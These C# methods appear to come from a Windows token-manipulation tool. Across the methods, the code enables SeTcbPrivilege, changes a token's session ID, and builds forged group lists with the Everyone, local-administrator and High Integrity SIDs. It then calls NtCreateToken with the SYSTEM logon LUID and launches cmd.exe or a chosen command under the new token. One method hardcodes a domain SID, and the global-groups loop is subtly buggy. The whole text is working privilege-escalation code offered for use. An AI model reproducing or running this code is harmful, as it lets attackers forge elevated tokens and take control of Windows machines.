//////////////////////////////////////////////////////////////////////////////// // Updates the token session ID to the specified session //////////////////////////////////////////////////////////////////////////////// public bool SetTokenSessionId(int sessionId) { bool exists, enabled; SetWorkingTokenToSelf(); TokenInformation.CheckTokenPrivilege(hWorkingToken, Winnt.SE_TCB_NAME, out exists, out enabled); if (!exists) { Console.WriteLine("[-] SeTcbPrivilege Does Not Exist On Token"); return(false); } SetWorkingTokenToRemote(); if (!enabled && !SetTokenPrivilege(Winnt.SE_TCB_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED)) { Console.WriteLine("[-] Enable SeTcbPrivilege Failed "); return(false); } Console.WriteLine("[*] Updating Token Session ID to {0}", sessionId); GCHandle handle = new GCHandle(); try { handle = GCHandle.Alloc(sessionId, GCHandleType.Pinned); if (!advapi32.SetTokenInformation( hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSessionId, handle.AddrOfPinnedObject(), sizeof(uint)) ) { Misc.GetWin32Error("SetTokenInformation"); return(false); } } catch (Exception ex) { Console.WriteLine(ex.Message); } finally { if (null != handle && handle.IsAllocated) { handle.Free(); } } return(true); }
//////////////////////////////////////////////////////////////////////////////// // Lists the users for threads //////////////////////////////////////////////////////////////////////////////// public void GetThreadUsers() { foreach (uint t in threads) { Console.WriteLine("[*] Thread ID: " + t); if (OpenThreadToken(t, Winnt.TOKEN_QUERY)) { using (TokenInformation ti = new TokenInformation(hWorkingThreadToken)) { ti.SetWorkingTokenToSelf(); ti.GetTokenUser(); } } } }
internal bool CreateTokenGroups(string domain, string userName, out Ntifs._TOKEN_GROUPS tokenGroups, out Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup, string[] groups) { uint LG_INCLUDE_INDIRECT = 0x0001; Console.WriteLine("[*] _TOKEN_GROUPS"); tokenGroups = new Ntifs._TOKEN_GROUPS(); tokenGroups.Initialize(); tokenPrimaryGroup = new Winnt._TOKEN_PRIMARY_GROUP(); #region NetUserGetLocalGroups //Console.WriteLine(" - NetUserGetLocalGroups"); lmaccess._LOCALGROUP_USERS_INFO_0[] localgroupUserInfo = new lmaccess._LOCALGROUP_USERS_INFO_0[0]; IntPtr bufPtr; uint ntRetVal = netapi32.NetUserGetLocalGroups( domain, userName.ToLower(), 0, LG_INCLUDE_INDIRECT, out bufPtr, -1, ref localEntriesRead, ref localTotalEntriesRead ); if (0 != ntRetVal) { Misc.GetNtError("NetUserGetLocalGroups", ntRetVal); Misc.GetNtError("[-] {0}", ntRetVal); //return false; } localgroupUserInfo = new lmaccess._LOCALGROUP_USERS_INFO_0[localEntriesRead]; Console.WriteLine("[+] Local Groups: {0}", localEntriesRead); for (int i = 0; i < localEntriesRead; i++) { var itemPtr = new IntPtr(bufPtr.ToInt64() + (Marshal.SizeOf(typeof(lmaccess._LOCALGROUP_USERS_INFO_0)) * i)); localgroupUserInfo[i] = (lmaccess._LOCALGROUP_USERS_INFO_0)Marshal.PtrToStructure(itemPtr, typeof(lmaccess._LOCALGROUP_USERS_INFO_0)); Console.WriteLine(" [+] {0}", localgroupUserInfo[i].lgrui0_name); } #endregion #region NetUserGetGroups //Console.WriteLine(" - NetUserGetGroups"); lmaccess._GROUP_USERS_INFO_0[] globalGroupUserInfo;// = new lmaccess._GROUP_USERS_INFO_0[0]; ntRetVal = netapi32.NetUserGetGroups( domain, userName.ToLower(), 0, out bufPtr, -1, ref globalEntriesRead, ref globalEotalEntriesRead ); if (0 != ntRetVal) { Misc.GetNtError("NetUserGetGroups", ntRetVal); Misc.GetNtError("[-] {0}", ntRetVal); //return false; } globalGroupUserInfo = new lmaccess._GROUP_USERS_INFO_0[globalEntriesRead]; Console.WriteLine("[+] Global Groups: {0}", globalEntriesRead); for (int i = 0; i < localEntriesRead; i++) { var itemPtr = new IntPtr(bufPtr.ToInt64() + (Marshal.SizeOf(typeof(lmaccess._GROUP_USERS_INFO_0)) * i)); globalGroupUserInfo[i] = (lmaccess._GROUP_USERS_INFO_0)Marshal.PtrToStructure(itemPtr, typeof(lmaccess._GROUP_USERS_INFO_0)); Console.WriteLine(" [+] {0}", globalGroupUserInfo[i].grui0_name); } #endregion #region Default Admin Entries uint groupsAttributes = (uint)(Winnt.SE_GROUP_ENABLED | Winnt.SE_GROUP_ENABLED_BY_DEFAULT | Winnt.SE_GROUP_MANDATORY); /* * This works, but don't do it this way * //Everyone * _InitializeSid(Winnt.SECURITY_WORLD_SID_AUTHORITY, new uint[] { 0, 0, 0, 0, 0, 0, 0, 0 }, ref tokenGroups.Groups[0].Sid); * tokenGroups.Groups[0].Attributes = groupsAttributes; */ //Console.WriteLine("[+] Extra Groups"); //Everyone InitializeSid("S-1-1-0", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; //Administrators - Make this a flag InitializeSid("S-1-5-114", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; //INTERACTIVE InitializeSid("S-1-5-4", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; //CONSOLE LOGON InitializeSid("S-1-2-1", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; //Authenticated Users InitializeSid("S-1-5-11", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; //This Organization InitializeSid("S-1-5-15", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; //Local account InitializeSid("S-1-5-113", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; //LOCAL InitializeSid("S-1-2-0", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; //NTLM Authentication InitializeSid("S-1-5-64-10", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; //High Integrity Token InitializeSid("S-1-16-12288", ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; #endregion #region Custom Groups //Custom groups foreach (string group in groups) { string d = Environment.MachineName; string groupname = group; if (group.Contains(@"\")) { string[] split = group.Split('\\'); d = split[0]; groupname = split[1]; } string sid = new NTAccount(d, groupname).Translate(typeof(SecurityIdentifier)).Value; InitializeSid(sid, ref tokenGroups.Groups[extraGroups].Sid); tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes; } #endregion #region Local & Global Entries for (int i = 0; i < localEntriesRead; i++) { int offset = i + extraGroups; //Console.WriteLine("[*] Adding: {0}", localgroupUserInfo[i].lgrui0_name); if (!_LookupSid(string.Empty, localgroupUserInfo[i].lgrui0_name, ref tokenGroups.Groups[offset].Sid)) { return(false); } tokenGroups.Groups[offset].Attributes = groupsAttributes; } for (int i = 0; i < globalEntriesRead; i++) { int offset = i + extraGroups + (int)localEntriesRead; //Console.WriteLine("[*] Adding: {0}", globalGroupUserInfo[i].grui0_name); if (!_LookupSid(string.Empty, globalGroupUserInfo[i].grui0_name, ref tokenGroups.Groups[offset].Sid)) { return(false); } if (0 == i) { tokenPrimaryGroup.PrimaryGroup = tokenGroups.Groups[offset].Sid; } tokenGroups.Groups[offset].Attributes = groupsAttributes; } #endregion tokenGroups.GroupCount = (int)(localEntriesRead + globalEntriesRead + extraGroups); Console.WriteLine("[*] Adding Groups"); for (int i = 0; i < tokenGroups.GroupCount; i++) { string sid, account; TokenInformation._ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account); Console.WriteLine(" ({0}) {1,-50} {2}", i, sid, account); } return(true); }
//SeCreateTokenPrivilege public void CreateToken(string[] groups, string command) { if (!_CheckPrivileges()) { return; } uint LG_INCLUDE_INDIRECT = 0x0001; uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF; Console.WriteLine(); Console.WriteLine("_SECURITY_QUALITY_OF_SERVICE"); Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE() { Length = (uint)Marshal.SizeOf(typeof(Winnt._SECURITY_QUALITY_OF_SERVICE)), ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,//SecurityAnonymous ContextTrackingMode = Winnt.SECURITY_CONTEXT_TRACKING_MODE.SECURITY_STATIC_TRACKING, EffectiveOnly = Winnt.EFFECTIVE_ONLY.False }; IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode)); Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false); Console.WriteLine("_OBJECT_ATTRIBUTES"); wudfwdm._OBJECT_ATTRIBUTES objectAttributes = new wudfwdm._OBJECT_ATTRIBUTES() { Length = (uint)Marshal.SizeOf(typeof(wudfwdm._OBJECT_ATTRIBUTES)), RootDirectory = IntPtr.Zero, Attributes = 0, ObjectName = IntPtr.Zero, SecurityDescriptor = IntPtr.Zero, SecurityQualityOfService = hSecurityContextTrackingMode }; TokenInformation ti = new TokenInformation(hWorkingToken); ti.SetWorkingTokenToSelf(); ti.GetTokenSource(); ti.GetTokenUser(); ti.GetTokenGroups(); ti.GetTokenPrivileges(); ti.GetTokenOwner(); ti.GetTokenPrimaryGroup(); ti.GetTokenDefaultDacl(); Winnt._LUID systemLuid = Winnt.SYSTEM_LUID; long expirationTime = long.MaxValue / 2; phNewToken = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr))); //out/ref hToken - required //Ref Expirationtime - required uint ntRetVal = ntdll.NtCreateToken( out phNewToken, Winnt.TOKEN_ALL_ACCESS, ref objectAttributes, Winnt._TOKEN_TYPE.TokenPrimary, ref systemLuid, ref expirationTime, ref ti.tokenUser, ref ti.tokenGroups, ref ti.tokenPrivileges, ref ti.tokenOwner, ref ti.tokenPrimaryGroup, ref ti.tokenDefaultDacl, ref ti.tokenSource ); if (0 != ntRetVal) { Misc.GetNtError("NtCreateToken", ntRetVal); new TokenInformation(phNewToken).GetTokenUser(); } if (string.IsNullOrEmpty(command)) { command = "cmd.exe"; } SetWorkingTokenToNewToken(); StartProcessAsUser(command); }
//////////////////////////////////////////////////////////////////////////////// // Can be use to remove groups, adding groups would require a new token // Next Release //https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups //////////////////////////////////////////////////////////////////////////////// public void SetTokenGroup(string group, bool isSID) { var tokenGroups = new Ntifs._TOKEN_GROUPS(); tokenGroups.Initialize(); if (!DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation)) { return; } SetWorkingTokenToNewToken(); TokenInformation ti = new TokenInformation(hWorkingToken); ti.GetTokenGroups(); for (int i = 0; i < ti.tokenGroups.GroupCount; i++) { tokenGroups.Groups[i].Sid = ti.tokenGroups.Groups[i].Sid; tokenGroups.Groups[i].Attributes = ti.tokenGroups.Groups[i].Attributes; Console.WriteLine(tokenGroups.Groups[i].Sid); } tokenGroups.GroupCount = ti.tokenGroups.GroupCount; if (!isSID) { Console.WriteLine("Group: {0}", group); string domain = Environment.MachineName; if (group.Contains(@"\")) { string[] split = group.Split('\\'); domain = split[0]; group = split[1]; } group = new NTAccount(domain, group).Translate(typeof(SecurityIdentifier)).Value; } Console.WriteLine("Group SID: {0}", group); ++tokenGroups.GroupCount; if (!CreateTokens.InitializeSid("S-1-5-21-258464558-1780981397-2849438727-1010", ref tokenGroups.Groups[tokenGroups.GroupCount].Sid)) { return; } tokenGroups.Groups[tokenGroups.GroupCount].Attributes = (uint)Winnt.SE_GROUP_ENABLED; CreateTokens ct = new CreateTokens(hWorkingToken); string userName = WindowsIdentity.GetCurrent().Name; userName = userName.Split('\\')[1]; //ct.CreateTokenGroups(userName, out Ntifs._TOKEN_GROUPS tg, out Winnt._TOKEN_PRIMARY_GROUP tpg); tokenGroups = ti.tokenGroups; uint returnLength; if (!advapi32.AdjustTokenGroups(hWorkingToken, false, ref tokenGroups, (uint)Marshal.SizeOf(tokenGroups), ref ti.tokenGroups, out returnLength)) { Misc.GetWin32Error("AdjustTokenGroups"); return; } ti.GetTokenGroups(); Console.WriteLine(returnLength); }